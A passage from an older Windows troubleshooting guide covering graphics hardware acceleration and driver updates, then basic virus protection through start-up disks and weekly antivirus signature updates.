* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

6 Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.